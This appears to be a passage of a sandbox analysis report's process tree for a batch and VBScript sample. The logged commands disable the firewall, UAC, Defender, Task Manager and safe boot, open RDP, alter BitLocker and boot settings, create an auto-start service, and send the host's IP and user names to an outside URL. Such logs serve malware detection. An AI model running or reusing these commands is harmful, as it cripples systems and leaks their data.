cmd.exe reg.exe PID 4796 wrote to memory of 1652 4796 cmd.exe reg.exe PID 4796 wrote to memory of 3852 4796 cmd.exe reg.exe PID 4796 wrote to memory of 3852 4796 cmd.exe reg.exe PID 4796 wrote to memory of 4496 4796 cmd.exe reg.exe PID 4796 wrote to memory of 4496 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2000 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2000 4796 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"1⤵PID:3672
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:208
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\malware.vbs1⤵
- Opens file in notepad (likely ransom note)
PID:2816
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:4580
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4520 -
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3456 -
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2148 -
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4932 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
PID:2504 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
PID:1488 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
PID:4228 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
PID:2720 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
PID:4728 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵PID:1620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵PID:5100
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"2⤵PID:708
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵PID:2644
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵PID:2096
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵PID:2396
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵PID:1588
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵PID:4396
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵PID:3832
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵PID:4452
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
PID:3520 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:2440
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵PID:3216
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵PID:1260
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵PID:4400
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:2476
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:2344
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:1652
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:3852
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:4496
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵PID:2000
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵PID:2780
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵PID:780
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵PID:1972
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵PID:3540
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵PID:4500
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵PID:1360
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Disables RegEdit via registry modification
PID:4916 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵PID:2744
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
PID:3672 -
C:\Windows\system32\findstr.exefindstr IPv43⤵PID:5004
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.2162⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4988 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x40,0x128,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb89147183⤵PID:2724
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:23⤵PID:3136
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:4044 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:83⤵PID:2816
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:13⤵PID:3540
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:13⤵PID:2336
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:83⤵PID:5348
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5492 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:13⤵PID:5500
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:13⤵PID:5508
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2224 /prefetch:13⤵PID:5792
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:13⤵PID:5800
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:13⤵PID:5196
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:13⤵PID:5304
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:13⤵PID:5620
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵PID:5028
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4956 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin2⤵PID:6128
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb89147183⤵PID:1360
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=yclextal\admin2⤵PID:5188
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb89147183⤵PID:3116
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "Admin"2⤵PID:5280
-
C:\Windows\system32\net.exenet user "Admin"3⤵PID:5312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "Admin"4⤵PID:1968
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5344 -
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5444 -
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵PID:5132
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵PID:5160
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
PID:5172 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
PID:5348 -
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
PID:3912 -
C:\Windows\system32\net.exenet start MiServicio2⤵PID:4976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵PID:2068
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2708 -
C:\Windows\system32\icacls.exeicacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"2⤵PID:5296
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"3⤵PID:4140
-
C:\Windows\system32\find.exefind "BackupProductKeyDefault"3⤵PID:5412
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=2⤵PID:2040
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb89147183⤵PID:2768
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4140
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1900
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat1⤵
- Modifies data under HKEY_USERS
PID:4752 -
C:\Windows\system32\net.exenet session2⤵PID:4148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:5624
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:5648 -
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:5684 -
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:444 -
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:6028 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
PID:6016 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
PID:6068 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
PID:2440 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5308 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
PID:5136 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵PID:2912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵PID:5616
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Windows\TEMP\disable_winload.reg"2⤵PID:5636
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵PID:5688
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
- Modifies data under HKEY_USERS
PID:1916 -
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
- Modifies data under HKEY_USERS
PID:3328 -
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
- Modifies data under HKEY_USERS
PID:5736 -
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
- Modifies data under HKEY_USERS
PID:6080 -
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵PID:2444
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵PID:4140
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
PID:4200 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:5284
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
PID:5352 -
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
- Modifies data under HKEY_USERS
PID:5600 -
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
- Modifies data under HKEY_USERS
PID:5592 -
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:5700
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
PID:5508 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:2340
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:5748
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
PID:5932 -
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵PID:6064
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
PID:6080 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵PID:2444
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵PID:4140
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵PID:4200
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵PID:5140
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
- Modifies data under HKEY_USERS
PID:4712 -
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
PID:5608 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵PID:5612
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
PID:5644 -
C:\Windows\system32\findstr.exefindstr IPv43⤵PID:4716
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵PID:5320
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5952 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "YCLEXTAL$"2⤵PID:6096
-
C:\Windows\system32\net.exenet user "YCLEXTAL$"3⤵PID:2444
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5288 -
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5336 -
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵PID:5348
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵PID:5512
-
